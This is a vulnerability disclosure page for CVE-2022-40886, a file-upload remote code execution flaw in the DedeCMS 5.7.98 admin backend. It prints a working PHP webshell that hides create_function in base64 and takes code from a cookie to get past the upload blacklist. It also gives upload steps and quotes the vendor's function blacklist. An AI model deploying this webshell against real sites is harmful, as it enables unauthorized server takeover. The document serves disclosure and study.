Headline
CVE-2022-40886: Vulnerability/DedeCMS-v5.7.98-RCE.md at master · Ephemeral1y/Vulnerability
DedeCMS 5.7.98 has a file upload vulnerability in the background.
DedeCMS v5.7.98 RCE
Dedecms official website:https://www.dedecms.com/download
Vulnerability Description
The dedecms v5.7.98 has a file upload function in the background, which can write malicious code to bypass detection and cause RCE vulnerabilities.
Affected product: DedeCMS V5.7.98 Attack type: Remote Affected component: /dede/file_manage_control.php
Recurrence Process
Visit /dede to login to the website background.
Upload the file below.
shell.php
<?php $a = "Y3JlYXRlX2Z1bmN0aW9u"; $b = base64_decode($a); $c = $_COOKIE[‘hello’] . ';’; $b('’, $c)();
Upload success.
Visit shell.php to get the webshell.
Code Audit
In /dede/file_manage_control.php, the file we upload will be checked by uploadsafe.inc.php
if (file\_exists($$\_key)) {
$fp = fopen($$\_key, 'rb');
$content = fread($fp, ${$\_key . '\_size'});
fclose($fp);
global $cfg\_disable\_funs;
$cfg\_disable\_funs = isset($cfg\_disable\_funs) ? $cfg\_disable\_funs : 'phpinfo,eval,assert,exec,passthru,shell\_exec,system,proc\_open,popen,curl\_exec,curl\_multi\_exec,parse\_ini\_file,show\_source,file\_put\_contents,fsockopen,fopen,fwrite,preg\_replace';
$cfg\_disable\_funs = $cfg\_disable\_funs.',\_GET,\_POST,\_REQUEST,include,create\_function,array\_map,call\_user\_func,call\_user\_func\_array,array\_filert';
foreach (explode(",", $cfg\_disable\_funs) as $value) {
$value = str\_replace(" ", "", $value);
if(!empty($value) && preg\_match("#\[^a-z\]+\['\\"\]\*{$value}\['\\"\]\*\[\\s\]\*\[(\[\]#i", " {$content}") == TRUE) {
$content = dede\_htmlspecialchars($content);
die("DedeCMS提示:当前上传的文件中存在恶意代码!<pre>{$content}</pre>");
}
if(!empty($value) && preg\_match("#(<)\[\\s\]\*(script)\[\\s\\S\]\*(src)\[\\s\]\*(=)\[\\s\]\*\[\\"|'\]#i", " {$content}") == TRUE) {
preg\_match\_all("#(src)\[\\s\]\*(=)\[\\s\]\*\[\\"|'\]\[\\s\]\*((http|https)(:\\/\\/)\[\\S\]\*)\[\\"|'\]#i", " {$content}", $subject);
foreach ($subject\[3\] as $url) {
if (preg\_match("#^(http|https):\\/\\/#i", $url) && !preg\_match("#^{$cfg\_basehost}#", $url)) {
die("DedeCMS提示:非本站资源无法访问!<pre>{$url}</pre>");
}
}
}
}
}
$cfg_disable_funsdefines a blacklist. When characters in the file content match the blacklist, they will be blocked. But this can be bypassed by coding in some way.
create_function is a PHP function, which create an anonymous (lambda-style) function. This callback function is in the blacklist, but we can assign it to a variable using base64 coding, and execute the function through the variable name.
_GET,_POST,_REQUEST are in the blacklist, so we can use _COOKIE to bypass.
By splicing the two together, we get the final payload.
In addition, the function blacklist of the blacklist can be modified in the background. We can also get shell in this way.
Related news
An arbitrary file upload vulnerability in the component /dede/file_manage_control.php of Dedecms v5.7.101 allows attackers to execute arbitrary code via a crafted PHP file. This vulnerability is related to an incomplete fix for CVE-2022-40886.